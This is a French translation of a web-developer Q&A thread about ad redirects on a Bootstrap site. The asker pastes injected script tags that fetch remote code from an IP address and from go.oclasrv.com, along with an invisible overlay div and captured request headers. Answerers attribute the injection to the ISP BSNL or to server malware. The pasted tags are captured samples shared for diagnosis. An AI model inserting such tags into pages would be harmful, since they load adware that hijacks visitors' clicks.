web-dev-qa-db-fra.com

des scripts inconnus sont en cours d'exécution et redirigent en cliquant sur des sites Web inconnus

Problème: - Parfois, en cliquant sur le menu NAVBAR ou sur une div de mon site Web bootstrap, il redirige vers des annonces ou des liens inconnus dans un nouvel onglet, quelque chose comme ceci. 

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Liens importés du fichier hébergé: - 

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

Ce que j'ai eu en inspection: - 

J'ai vérifié mon code plusieurs fois lorsqu'il n'y a pas de redirection en cliquant sur le menu .. Je n'ai rien trouvé de suspect ... MAIS ALORS, lorsque j'ai eu les liens de redirection au clic, j'ai vérifié mon code dans le navigateur et je peux clairement voir quelques sources de script ajouté à mes fichiers (peut voir en mode d'inspection dans les navigateurs uniquement). Ils ne sont pas écrits dans mon code. Les parties inconnues de mon code sont ..

1) ICI Les 2 scripts suivants remplacent le script js/jquery.min.js dans la balise head 

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22Host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) Celui-ci est ajouté à la balise body juste après avoir importé google api

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) Celui-ci est également en balise body.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) Sur l'inspection du lien de redirection. Les infos HEADERS: -

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

Ce que j'ai essayé: - 

Mon code est propre et il n'y a pas de script qui le redirige quelque part. Il se peut que mon navigateur ou Windows soient compromis. Le site Web vérifié par 3 navigateurs Edge, CHROME, FIREFOX .. a le même problème. puis je suis passé de Windows 7 à Windows 10 et ai effectué une nouvelle installation. Mais rien ne s'est passé. Ensuite, j'ai pensé demander à l'assistance de Hostgator si le serveur était compromis, ils ont répondu que c'était correct de leur part ... J'ai installé malwarebytes et tous les logiciels pour le résoudre ... mais ils notent simplement que chrome/firefox/Edge est en cours de redirection Identifiant avec un nom de domaine principalement go.oclasrv.com et ne rien faire. 

**

TOUTE SOLUTION???

**

METTRE À JOUR:-

J'ai eu une redirection similaire sur le lien de commentaires de l'assistance Hostgator.

Sur remarque, le nom de domaine dans la chaîne est remplacé par rateus.in Zoneid = 1492761 est identique, quel que soit le lien non sécurisé que j'ouvre .. = c2VwLW5vLXJlZGlyZWN0 est identique pour tous les liens que j'ouvre.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22Host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

Mon système d'exploitation est complètement mis à niveau vers WIN10 pro et je n'ai installé que Chrome sans plug-in ...

Le problème est indépendant du navigateur car j'ai les mêmes résultats sur Edge et Firefox.

TOUT JS EXPERT QUI PEUT ME AIDER ICI

javascriptjqueryhtmlcssmalware
9
aman

Cela semble être un cas de FAI injectant des fichiers JavaScript. Êtes-vous par hasard sur le haut débit BSNL?. Depuis quelques jours, BSNL semble injecter des Adwares sur des sites HTTP (non chiffrés).

La seule solution que je connaisse consiste à héberger votre site sur https OR pour changer de fournisseur d'accès.

8
Jayson Chacko

Ce problème que vous rencontrez est côté serveur. Votre code n’est probablement pas défectueux, mais le serveur est infecté par des logiciels malveillants qui injectent ce code erroné dans votre site Web.

Pour résoudre ce problème, je voudrais faire une sauvegarde du code que vous avez écrit, changer vos mots de passe d'hébergement FTP, effacer votre serveur et rajouter votre code. Si cela ne résout pas le problème, je changerais alors de fournisseur d'hébergement.

1
Jake Chasan

Si vous voyez un script inconnu injecté à partir des adresses IP suivantes, il s'agit du fichier de script injecté par le fournisseur de services Internet BSNL.

61.0.245.90, 117.205.13.171

Ces scripts sont injectés uniquement lorsque vous visitez des sites Web HTTP. HTTPS implique la sécurité de la couche de transport, il ne peut donc pas être falsifié par le FAI. 

Les fichiers de script de cette adresse IP sont simplement un moyen de transport qui télécharge d'autres scripts AD à partir de différents supports AD. La plupart de ces médias AD suivent des publicités intrusives en détournant les clics de souris des utilisateurs pour ouvrir leurs fenêtres contextuelles. 

L’excuse de BSNL pour une telle activité est qu’il s’agit d’une fonctionnalité permettant d’améliorer la navigation des abonnés. Un article détaillé est écrit sur BSNL insérant de tels scripts et comment les arrêter. 

0
David Chelliah